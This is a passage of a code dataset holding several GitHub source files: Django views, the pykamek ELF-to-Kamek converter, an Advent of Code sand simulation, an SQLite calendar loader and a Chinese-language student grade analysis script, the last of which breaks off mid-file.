{"api_name": "cv2.VideoCapture", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 58, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 60, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 64, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.floor", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 81, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 97, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 97, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 98, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "myhog3d.compute", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "time.time", "line_number": 136, "usage_type": "call"}, {"api_name": "time.time", "line_number": 140, "usage_type": "call"}]}
+{"seq_id": "1778120262", "text": "from django.shortcuts import render\n# from django.http import HttpResponse\nfrom .forms import ContactForm\nfrom .models import Contact\nfrom django.http import HttpResponseRedirect\n\n# Create your views here.\ndef contact(request):\n form = ContactForm()\n return render(request,\"contato.html\",{\"form\":form})\n\ndef saving_contact(request):\n form = ContactForm(request.POST)\n if form.is_valid():\n contato_enviado = Contact(name=form.cleaned_data['name'],\n email=form.cleaned_data['email'],\n phone=form.cleaned_data['phone'],\n subject=form.cleaned_data['subject'],\n message=form.cleaned_data['message'])\n contato_enviado.save()\n return HttpResponseRedirect('/')\n", "repo_name": "alexzwir/zwodonto_old", "sub_path": "website/contact/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 814, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "forms.ContactForm", "line_number": 9, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "forms.ContactForm", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Contact", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "19561293313", "text": "__version__ = \"1.0.3\"\n__author__ = 'JoshuaMK'\n__credits__ = 'Treeki'\n\nimport re\nfrom argparse import ArgumentParser\nfrom io import BytesIO\nfrom pathlib import Path\nfrom typing import List, Union\n\nfrom dolreader.dol import DolFile\n\nfrom pykamek import __version__\nfrom pykamek.addressmapper import AddressMapper\nfrom pykamek.exceptions import InvalidDataException\nfrom pykamek.kamek import KamekBinary\nfrom pykamek.linker import Linker\nfrom pykamek.versionmap import VersionMapper\n\n\ndef sorted_alphanumeric(l):\n \"\"\" Sort the given iterable in the way that humans expect.\"\"\"\n def convert(text): return int(text) if text.isdigit() else text\n def alphanum_key(key): return [convert(c)\n for c in re.split('([0-9]+)', str(key))]\n return sorted(l, key=alphanum_key)\n\n\nclass ElfHandler(Linker):\n def __init__(self, base: AddressMapper, files: Union[Path, List[Path]]):\n super().__init__(base)\n\n self.outputPath = None\n self.versionMap = None\n self.externals = {}\n\n if isinstance(files, Path):\n self.add_module(files)\n elif isinstance(files, str):\n self.add_module(Path(files))\n else:\n for obj in sorted_alphanumeric(files):\n obj = Path(obj)\n if obj.is_file():\n self.add_module(obj)\n else:\n for f in sorted_alphanumeric(obj.iterdir()):\n if f.is_file:\n self.add_module(f)\n\n def __repr__(self):\n return f\"repr={vars(self)}\"\n\n def __str__(self):\n return f\"ELF module converter; {self.__repr__()}\"\n\n @staticmethod\n def read_externals(file: str) -> dict:\n symbolDict = {}\n assignmentRegex = re.compile(\n r\"^\\s*([a-zA-Z0-9_<>,\\-\\$]+)\\s*=\\s*0x([a-fA-F0-9]+)\\s*(#.*)?$\")\n\n with open(file, \"r\") as f:\n for i, line in enumerate(f.readlines()):\n if line.strip() == \"\" or line.strip().startswith(\"#\") or line.strip().startswith(\"//\"):\n continue\n\n try:\n match = re.findall(assignmentRegex, line.strip())\n _symbol = match[0][0]\n _address = match[0][1]\n except IndexError:\n raise InvalidDataException(\n f\"Symbol definition {line.strip()} at line {i} is an invalid entry\")\n\n try:\n symbolDict[_symbol] = int(_address, 16)\n except ValueError:\n raise InvalidDataException(\n f\"Address {_address} at line {i} is not a hexadecimal number\")\n\n return symbolDict\n\n\ndef main(args: list):\n parser = ArgumentParser(\n f\"pykamek {__version__}\", description=\"ELF to Kuribo module converter\")\n\n parser.add_argument(\n \"elf\", help=\"ELF object file(s) and or folders of ELF object files\", nargs=\"+\")\n parser.add_argument(\n \"--dynamic\", help=\"The module is dynamically relocated\", action=\"store_true\")\n parser.add_argument(\n \"--static\", help=\"The module is statically located at ADDR\", metavar=\"ADDR\")\n parser.add_argument(\n \"--output-kamek\", help=\"File to output Kamek Binary\", metavar=\"FILE\")\n parser.add_argument(\n \"--output-riiv\", help=\"File to output riivolution XML\", metavar=\"FILE\")\n parser.add_argument(\n \"--output-gecko\", help=\"File to output gecko code\", metavar=\"FILE\")\n parser.add_argument(\n \"--output-code\", help=\"File to output raw code\", metavar=\"FILE\")\n parser.add_argument(\"--input-dol\", help=\"Input DOL file\", metavar=\"FILE\")\n parser.add_argument(\n \"--output-dol\", help=\"File to output patched DOL\", metavar=\"FILE\")\n parser.add_argument(\"--extern\", help=\"External linker map\", metavar=\"FILE\")\n parser.add_argument(\n \"--versionmap\", help=\"Version map for address translations\", metavar=\"FILE\")\n\n args = parser.parse_args(args)\n\n if args.dynamic and args.static:\n parser.error(\"Args `--dynamic' and `--static' cannot be used together\")\n elif not args.dynamic and not args.static:\n parser.error(\"Must provide either `--dynamic' or `--static' arguments\")\n\n _externals = None\n _versionMap = None\n\n if args.dynamic:\n _baseAddr = None\n elif args.static:\n _baseAddr = int(args.static, 16)\n\n _externals = {}\n if args.extern:\n _externals = ElfHandler.read_externals(Path(args.extern).resolve())\n\n if args.versionmap:\n _versionMap = VersionMapper(Path(args.versionmap).resolve())\n else:\n _versionMap = VersionMapper()\n\n _outputKamekPath = None\n _outputRiivPath = None\n _outputGeckoPath = None\n _outputCodePath = None\n _inputDolPath = None\n _outputDolPath = None\n\n if args.output_kamek:\n _outputKamekPath = Path(args.output_kamek).resolve()\n if args.output_riiv:\n _outputRiivPath = Path(args.output_riiv).resolve()\n if args.output_gecko:\n _outputGeckoPath = Path(args.output_gecko).resolve()\n if args.output_code:\n _outputCodePath = Path(args.output_code).resolve()\n if args.input_dol:\n _inputDolPath = Path(args.input_dol).resolve()\n if args.output_dol:\n _outputDolPath = Path(args.output_dol).resolve()\n\n if (_outputKamekPath is None and\n _outputRiivPath is None and\n _outputGeckoPath is None and\n _outputCodePath is None and\n _outputDolPath is None\n ):\n parser.error(\"No output path(s) specified\")\n\n if _inputDolPath is None and _outputDolPath:\n parser.error(\"Input DOL path not specified\")\n\n for versionKey in _versionMap.mappers:\n print(f\"Linking version {versionKey}\")\n\n elfConverter = ElfHandler(_versionMap.mappers[versionKey], args.elf)\n\n if _baseAddr:\n elfConverter.link_static(_externals, _baseAddr)\n else:\n elfConverter.link_dynamic(_externals)\n\n kb = KamekBinary()\n kb.load_from_linker(elfConverter)\n if _outputKamekPath:\n with open(str(_outputKamekPath).replace(\"$KV$\", versionKey), \"wb\") as kBinary:\n kBinary.write(kb.pack().getvalue())\n if _outputRiivPath:\n with open(str(_outputRiivPath).replace(\"$KV$\", versionKey), \"w\") as kBinary:\n kBinary.write(kb.pack_riivo())\n if _outputGeckoPath:\n with open(str(_outputGeckoPath).replace(\"$KV$\", versionKey), \"w\") as kBinary:\n kBinary.write(kb.pack_gecko_codes())\n if _outputCodePath:\n with open(str(_outputCodePath).replace(\"$KV$\", versionKey), \"wb\") as kBinary:\n kBinary.write(kb.rawCode.getvalue())\n\n if _outputDolPath:\n dol = DolFile(BytesIO(_inputDolPath.read_bytes()))\n kb.apply_to_dol(dol)\n\n outPath = str(_outputDolPath).replace(\"$KV$\", versionKey)\n\n with open(outPath, \"wb\") as outDol:\n dol.save(outDol)\n\n print(\"Finished execution\")\n", "repo_name": "JoshuaMKW/pykamek", "sub_path": "pykamek/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 7045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "re.split", "line_number": 25, "usage_type": "call"}, {"api_name": "pykamek.linker.Linker", "line_number": 29, "usage_type": "name"}, {"api_name": "pykamek.addressmapper.AddressMapper", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 30, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 30, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 37, "usage_type": "argument"}, {"api_name": "pathlib.Path", "line_number": 40, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 60, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 69, "usage_type": "call"}, {"api_name": "pykamek.exceptions.InvalidDataException", "line_number": 73, "usage_type": "call"}, {"api_name": "pykamek.exceptions.InvalidDataException", "line_number": 79, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 86, "usage_type": "call"}, {"api_name": "pykamek.__version__", "line_number": 87, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 127, "usage_type": "call"}, {"api_name": "pykamek.versionmap.VersionMapper", "line_number": 130, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 130, "usage_type": "call"}, {"api_name": "pykamek.versionmap.VersionMapper", "line_number": 132, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 142, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 144, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 146, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 148, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 150, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 152, "usage_type": "call"}, {"api_name": "pykamek.kamek.KamekBinary", "line_number": 175, "usage_type": "call"}, {"api_name": "dolreader.dol.DolFile", "line_number": 191, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 191, "usage_type": "call"}]}
+{"seq_id": "27291739909", "text": "from collections import deque\ndef findRedundantBrackets(s:str):\n stack = deque()\n i = 0\n while i < len(s):\n if s[i] == '(' or s[i] == '{' or s[i] == '[':\n stack.append(s[i])\n if (s[i] == '+' or s[i] == '-' or s[i] == '*' or s[i] == '/') and len(stack) != 0:\n while i != len(s):\n if s[i] == ')' or s[i] == '}' or s[i] == ']':\n stack.pop()\n break\n i += 1\n i += 1 \n if len(stack) == 0:\n return 'No'\n else:\n return 'Yes'\n\nprint(findRedundantBrackets('(a+b)'))", "repo_name": "yugsharma1711/DS-ALGO", "sub_path": "Stacks/redundantRemoval.py", "file_name": "redundantRemoval.py", "file_ext": "py", "file_size_in_byte": 662, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.deque", "line_number": 3, "usage_type": "call"}]}
+{"seq_id": "543940191", "text": "import re\n\nimport feedparser\nfrom django.conf import settings\nfrom django.core.cache import cache\n\n\ndef convert_http_to_https(url):\n url = url.replace(\"http://\", \"https://\") if url and url.startswith('http://') else url\n return url\n\n\ndef get_news_cached(base_url):\n cache_key = 'news_cache_key'\n news = cache.get(cache_key)\n if not news:\n news = get_news(base_url)\n cache.set(cache_key, news, settings.NEWS_FEED_CACHE_TIMEOUT)\n return news\n\n\ndef get_news(base_url):\n img_re = re.compile(r' ')\n slug_re = re.compile(r'([\\w-]+$)')\n entries = get_news_feeds()\n for entity in entries:\n img_search = img_re.search(entity.description)\n try:\n entity.image = convert_http_to_https(img_search.group(1))\n entity.parsed_description = img_re.sub('', entity.description)\n except AttributeError:\n entity.parsed_description = entity.description\n\n try:\n entity.slug = slug_re.search(entity.link).group(1)\n entity.real_link = base_url + entity.slug if base_url and entity.slug else entity.link\n except AttributeError:\n entity.slug = None\n entity.real_link = entity.link\n\n if not hasattr(entity, 'image') or not entity.image:\n entity.is_default_image = True\n entity.image = settings.NEWS_FEED_DEFAULT_IMAGE\n\n return entries\n\n\ndef get_news_feeds():\n feed = feedparser.parse(settings.NEWS_FEED_URL)\n return feed.entries\n", "repo_name": "City-of-Helsinki/digihel", "sub_path": "news/news.py", "file_name": "news.py", "file_ext": "py", "file_size_in_byte": 1523, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.core.cache.cache.get", "line_number": 15, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 15, "usage_type": "name"}, {"api_name": "django.core.cache.cache.set", "line_number": 18, "usage_type": "call"}, {"api_name": "django.core.cache.cache", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.settings.NEWS_FEED_CACHE_TIMEOUT", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 18, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 23, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 24, "usage_type": "call"}, {"api_name": "django.conf.settings.NEWS_FEED_DEFAULT_IMAGE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 43, "usage_type": "name"}, {"api_name": "feedparser.parse", "line_number": 49, "usage_type": "call"}, {"api_name": "django.conf.settings.NEWS_FEED_URL", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 49, "usage_type": "name"}]}
+{"seq_id": "33608091415", "text": "import sqlite3\nfrom sqlite3 import Error\nimport numpy as np \nimport pandas as pd\nfrom datetime import datetime, time\n\n\ndef create_connection(db_file):\n\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n\n return conn\n\n\ndef fetch_slots(conn):\n cur = conn.cursor()\n cur.execute(f'SELECT * FROM slots;')\n\n rows = cur.fetchall()\n\n slots = []\n for row in rows:\n slots.append(row)\n\n return slots\n\ndef create_calender(conn, calender):\n sql = ''' INSERT INTO calender(user_id,slot_id)\n VALUES(?,?) '''\n cur = conn.cursor()\n cur.execute(sql, calender)\n conn.commit()\n return cur.lastrowid\n\ndef main():\n \n # Enter Path where you want your database to be:\n database = r\"database.db\"\n\n\n # create a database connection => Db will be created if there does not exists one.\n conn = create_connection(database)\n\n with conn:\n\n slots = fetch_slots(conn)\n\n for slot in slots:\n\n # calender = (7, slot[0])\n # create_calender(conn, calender)\n # calender = (8, slot[0])\n # create_calender(conn, calender)\n calender = (10, slot[0])\n create_calender(conn, calender)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "Poornartha/RasaChatbot", "sub_path": "actions/load_calender.py", "file_name": "load_calender.py", "file_ext": "py", "file_size_in_byte": 1308, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sqlite3.connect", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 14, "usage_type": "name"}]}
+{"seq_id": "37329692972", "text": "from collections import defaultdict\nfrom copy import deepcopy\nimport sys\n\ndo_print = True if '--print' in sys.argv else False\nfile_arg = [arg for arg in sys.argv[1:] if arg != '--print']\ninput = open(file_arg[0] if len(file_arg) >= 1 else 'input').read()\nlines = input.split('\\n')\n\ngrid = defaultdict(lambda: '.')\n\nfor line in lines:\n path = [(int(x), int(y)) for x, y in [pair.split(',') for pair in line.split(' -> ')]]\n\n for (sx, sy), (ex, ey) in list(zip(path, path[1:])):\n sx, ex = sorted([sx, ex])\n sy, ey = sorted([sy, ey])\n for y in range(sy, ey + 1):\n for x in range(sx, ex + 1):\n grid[(x,y)] = '#'\n\ndef get_bounds(grid: defaultdict[tuple[int, int], str]):\n min_x, max_x, min_y, max_y = 999999999, 0, 999999999, 0\n for (x,y), _ in grid.items():\n if x < min_x:\n min_x = x\n if x > max_x:\n max_x = x\n if y < min_y:\n min_y = y\n if y > max_y:\n max_y = y\n return min_x, max_x, min_y, max_y\n\ndef print_state(grid):\n minx, maxx, miny, maxy = get_bounds(grid)\n G = [[grid[(x,y)] for x in range(minx, maxx + 1)] for y in range(miny, maxy + 1)]\n for row in G:\n print(\"\".join(row))\n\ndef find_move(grid: defaultdict[tuple[int, int], str], sand: tuple[int, int], maxy: int):\n down = lambda p: (p[0], p[1]+1)\n diag_left = lambda p: (p[0]-1, p[1]+1)\n diag_right = lambda p: (p[0]+1, p[1]+1)\n\n for op in [down, diag_left, diag_right]:\n nx, ny = op(sand)\n\n if maxy != None and ny == maxy:\n return None\n # If we can move the sand in the current direction let's do it\n if grid[(nx, ny)] == '.':\n return (nx, ny)\n return None\n\n\n# Simulation time\ndef run_simulation(input_grid: defaultdict[tuple[int, int], str], part1: bool):\n grid = deepcopy(input_grid)\n _, _, _, maxy = get_bounds(grid)\n sand_origin = (500, 0)\n continue_simulation = True\n while continue_simulation:\n # Spawn 1 below the origin\n sand = (sand_origin[0], sand_origin[1])\n while True:\n move = find_move(grid, sand, None if part1 else maxy + 2)\n\n if move == None:\n grid[sand] = 'o'\n if part1 == False and sand == sand_origin:\n continue_simulation = False\n break\n else:\n if part1 and sand[1] > maxy:\n continue_simulation = False\n break\n sand = move\n \n return grid\n\n# Print initial grid state\ndo_print and print_state(grid)\n\n# Print part 1\np1_grid = run_simulation(grid, True)\ndo_print and print_state(p1_grid)\nprint(sum(1 for x in p1_grid.values() if x == 'o'))\n\n# Print part 2\np2_grid = run_simulation(grid, False)\ndo_print and print_state(p2_grid)\nprint(sum(1 for x in p2_grid.values() if x == 'o'))", "repo_name": "timfennis/advent-of-code-2022", "sub_path": "python/day14/day14.py", "file_name": "day14.py", "file_ext": "py", "file_size_in_byte": 2875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.argv", "line_number": 5, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "collections.defaultdict", "line_number": 10, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 22, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 41, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 58, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 59, "usage_type": "call"}]}
+{"seq_id": "6177776579", "text": "from email import encoders\r\nfrom email.header import Header\r\nfrom email.mime.text import MIMEText\r\nfrom email.utils import parseaddr, formataddr\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nimport smtplib\r\nfrom openpyxl import load_workbook,Workbook\r\nimport subprocess as sb\r\nfrom openpyxl.styles import PatternFill, Alignment, Side, Border\r\nimport csv\r\nimport zipfile\r\nimport time\r\nimport os\r\nimport pandas as pd\r\nfrom pandas import DataFrame,Series\r\n#分组平均聚合\r\n####数据可视化\r\n##设置中文字体\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.pyplot import plot,savefig\r\nimport smtplib\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.multipart import MIMEMultipart\r\n#matplotlib.use('Agg')\r\n##仿宋字体设置\r\nplt.rcParams['font.family'] = ['FangSong']\r\npaths ='./成绩分析清洗.csv'\r\ntarget ='./学生个人成绩/'\r\n\r\ndef mkdir(path):\r\n folder = os.path.exists(path)\r\n if not folder: \r\n os.makedirs(path) \r\n else:\r\n print(\"--- There is this folder! ---\")\r\n##参数预置\r\ntar_list =[]\r\ntest_list =[]\r\nsums =0\r\n##压缩文件模块\r\nclass zip:\r\n def get_zip(self,files,zip_name):\r\n zp=zipfile.ZipFile(zip_name,'w', zipfile.ZIP_DEFLATED)\r\n for file in files:\r\n zp.write(file)\r\n zp.close()\r\n time.sleep(1)\r\n\r\nlest =os.listdir('./')\r\nprint(lest)\r\npath1 =input(\"选择要打开的表格名称(输入序号): \")\r\npath1 =lest[int(path1)-1]\r\npath ='./'+path1\r\ndef open_f():\r\n lest =os.listdir('./')\r\n print(lest)\r\n path1 =input(\"选择要打开的表格名称(输入序号): \")\r\n path1 =lest[int(path1)-1]\r\n path ='./'+path1\r\n return path\r\n\r\ndef menu_all():\r\n print('''\r\n ********菜单********\r\n 1.进入学生信息系统\r\n 2.进入教师成绩系统\r\n 0.退出\r\n ''')\r\ndef menu2():\r\n print('''\r\n ********成绩系统********\r\n 1.学生成绩访问(查询,增加,删除,修改)\r\n 2.学生成绩分析\r\n ''')\r\ndef menu2_add():\r\n print('''\r\n 1.学生成绩查询\r\n 2.学生成绩增加\r\n 3.学生成绩删除\r\n 4.学生成绩修改\r\n ''') \r\n\r\ndef api_c():\r\n #调用c程序用以生成 xxx.txt\r\n sb.run([\"info.exe\"])\r\n\r\ndef visit():\r\n menu2_add()\r\n choice =input(\"请输入您的选择:\")\r\n\r\n if(choice =='1'):#学生成绩查询\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n name =input(\"请输入要查询的学生姓名: \")\r\n k =search(name)\r\n for cell in ws[2]:\r\n print(\"%s \"%cell.value,end =\"\")\r\n print(\"\\n\")\r\n for row in ws.iter_rows(min_row =k,max_row =k,min_col=1,max_col=6,values_only= True):\r\n print(row)\r\n \r\n elif(choice =='2'):#学生成绩增加\r\n print('''\r\n 1.横向增加学生成绩\r\n 2.纵向增加科目成绩\r\n ''')\r\n choices =input(\"请输入您的选择: \")\r\n if(choices =='1'):\r\n scores_x()\r\n elif(choices =='2'):\r\n scores_y()\r\n\r\n elif(choice =='3'):#学生成绩删除\r\n print('''\r\n 1.横向删除学生的所有成绩信息\r\n 2.纵向删除课程的所有成绩信息\r\n ''')\r\n choices =input(\"请输入您的选择: \")\r\n if(choices =='1'):\r\n del_X()\r\n elif(choices =='2'):\r\n del_y()\r\n \r\n elif(choice =='4'):#学生成绩修改\r\n name =input(\"请输入待修改学生姓名: \")\r\n lesson =input(\"请输入待修改科目: \")\r\n score =input(\"请输入待修改成绩数值: \")\r\n vary(name,lesson,score)\r\n\r\ndef search(name):\r\n k =1\r\n wb = load_workbook(path)\r\n ws = wb.active\r\n for cell in ws['C']:\r\n if(cell.value !=name):\r\n k =k+1\r\n else:\r\n break\r\n return k\r\n\r\ndef scores_x():\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n adds =input(\"请依次输入以下信息以逗号间隔 例如 班级,学号,姓名,语文,数学,英语 :\")\r\n lists =adds.split(\",\")\r\n ws.append(lists)\r\n rows =ws.max_row\r\n for cell in ws[rows]:\r\n cell.alignment = align\r\n wb.save(path)\r\n\r\ndef scores_y():\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n cols =ws.max_column\r\n cols =['A','B','C','D','E','F','G','H'][cols-1]\r\n rows =ws.max_row\r\n lesson =input(\"输入要增加的科目:\")\r\n ws[cols+'2'] =lesson\r\n for i in range(3,rows+1):\r\n print(ws['C'+str(i)].value)\r\n score =input(\"输入该同学\"+lesson+'成绩: ' )\r\n ws[cols+str(i)] =score\r\n ws[cols+str(i)].alignment = align\r\n print(\"\\n\")\r\n wb.save(path)\r\n\r\ndef del_X():\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n adds =input(\"请输入要删除的学生姓名: \")\r\n k =search(adds)\r\n ws.delete_rows(k) #删除从第一行开始算的2行内容\r\n wb.save(path)\r\n\r\ndef del_y():\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n adds =input(\"请输入要删除的课程名称: \")\r\n k =4\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n for i in ['D','E','F','G','H']:\r\n if(ws[i+str(2)].value !=adds):\r\n k =k+1\r\n else:\r\n break\r\n ws.delete_cols(k) #删除从第一列开始算的2列内容\r\n wb.save(path)\r\n\r\ndef vary(name,lesson,score):\r\n rows =search(name)\r\n wb =load_workbook(path)\r\n ws = wb.active\r\n k =4\r\n for i in ['D','E','F','G','H']:\r\n if(ws[i+str(2)].value !=lesson):\r\n k =k+1\r\n else:\r\n break\r\n cols =['A','B','C','D','E','F','G','H'][k-1]\r\n ws[cols+str(rows)] =score\r\n ws[cols+str(rows)].alignment = align\r\n wb.save(path)\r\n\r\n\r\n\r\ndef analyze_fun(ws1,ws2):#成绩分析\r\n fo =open('期中期末成绩汇总表.csv','w',encoding= 'utf-8')\r\n lists =[]\r\n lists.append(['班级','姓名','期中语文','期中数学','期中英语','期末语文','期末数学','期末英语','\\n'])\r\n lists =\",\".join(lists[0])\r\n fo.write(lists)\r\n str1 =''\r\n lists =[]\r\n for row in ws1.iter_rows(min_row =3,max_row =782,min_col =2,max_col =6,values_only =True):\r\n for i in row:\r\n if i ==row[-1]:\r\n str1 =str1+str(i)\r\n else:\r\n str1 =str1+str(i)+','\r\n lists.append(str1)\r\n str1 =''\r\n x =0\r\n for row in ws2.iter_rows(min_row =3,max_row =782,min_col =4,max_col =6,values_only =True):\r\n for i in row:\r\n if i ==row[-1]:\r\n lists[x] =lists[x]+','+str(i)+'\\n'\r\n else:\r\n lists[x] =lists[x]+','+str(i)\r\n x =x+1\r\n for i in lists:\r\n fo.write(i)\r\n fo.close()\r\n\r\ndef analyze_clean():\r\n read_csv =pd.read_csv('./期中期末成绩汇总表.csv',encoding ='utf-8')\r\n read_csv =read_csv.drop('Unnamed: 8',axis=1)\r\n #查找缺失值\r\n read_csv.isna()\r\n #删除缺失值\r\n read_csv =read_csv.dropna()\r\n #can't del repetitive value\r\n analy =read_csv.describe()\r\n analy.to_csv('./��绩描述性统计数据.csv',encoding ='utf-8')\r\n #描述性统计分析后没有异常值存在,为简化不必清洗异常值\r\n #清洗后数据存储\r\n read_csv.to_csv('./成绩分析清洗.csv',encoding ='utf-8')\r\n\r\ndef analyze_class():\r\n grade_df =pd.read_csv('./成绩分析清洗.csv',encoding ='utf-8')\r\n grade_df\r\n #平均成绩聚合\r\n grade_mid_chinese =grade_df.groupby('班级')['期中语文'].mean()\r\n grade_last_chinese =grade_df.groupby('班级')['期末语文'].mean()\r\n grade_mid_math =grade_df.groupby('班级')['期中数学'].mean()\r\n grade_last_math =grade_df.groupby('班级')['期末数学'].mean()\r\n grade_mid_eng =grade_df.groupby('班级')['期中英语'].mean()\r\n grade_last_eng =grade_df.groupby('班级')['期末英语'].mean()\r\n grade_df2 =DataFrame({'期中语文':grade_mid_chinese,'期末语文':grade_last_chinese,'期中数学':grade_mid_math,'期末数学':grade_last_math,'期中英语':grade_mid_eng,'期末英语':grade_last_eng})\r\n grade_df2.to_csv('./班级分组平均成绩聚合.csv',encoding ='utf-8')\r\n #成绩标差聚合\r\n grades_mid_chinese =grade_df.groupby('班级')['期中语文'].std()\r\n grades_last_chinese =grade_df.groupby('班级')['期末语文'].std()\r\n grades_mid_math =grade_df.groupby('班级')['期中数学'].std()\r\n grades_last_math =grade_df.groupby('班级')['期末数学'].std()\r\n grades_mid_eng =grade_df.groupby('班级')['期中英语'].std()\r\n grades_last_eng =grade_df.groupby('班级')['期末英语'].std()\r\n grades_df2 =DataFrame({'期中语文':grades_mid_chinese,'期末语文':grades_last_chinese,'期中数学':grades_mid_math,'期末数学':grades_last_math,'期中英语':grades_mid_eng,'期末英语':grades_last_eng})\r\n grades_df2.to_csv('./班级分组标差成绩聚合.csv',encoding ='utf-8')\r\n \r\n #画布生成\r\n plt.figure(figsize =(15,15))\r\n fun_read =pd.read_csv('./班级分组平均成绩聚合.csv',encoding ='utf-8')\r\n xclass =fun_read['班级']\r\n ychinese =fun_read[['期中语文','期末语文']]\r\n plt.plot(xclass,ychinese,linewidth =3,marker ='o',markersize =10,markerfacecolor ='w')\r\n #图表标题及字体大小\r\n plt.title('各班语文平均成绩折线图',fontsize =20)\r\n #坐标轴刻度字体\r\n plt.xticks(fontsize =15,rotation =90)\r\n plt.yticks(fontsize =15)\r\n plt.xlabel('班级',fontsize =15)\r\n plt.ylabel('成绩(分)',fontsize =15)\r\n plt.legend(['期中语文','期末语文'])\r\n savefig('./各班语文平均成绩折线图.png')\r\n plt.close()\r\n\r\n \r\n funs_read =pd.read_csv('./班级分组标差成绩聚合.csv',encoding ='utf-8')\r\n plt.figure(figsize =(15,15))\r\n ####柱状图基本设计\r\n # 设置 x/y 坐标值\r\n x =funs_read['班级']\r\n y =funs_read['期中语文']\r\n plt.plot(x, y, color='dodgerblue')\r\n plt.title('年级班级语文成绩标差分布',fontdict ={\r\n 'family': 'FangSong', 'color': 'black', 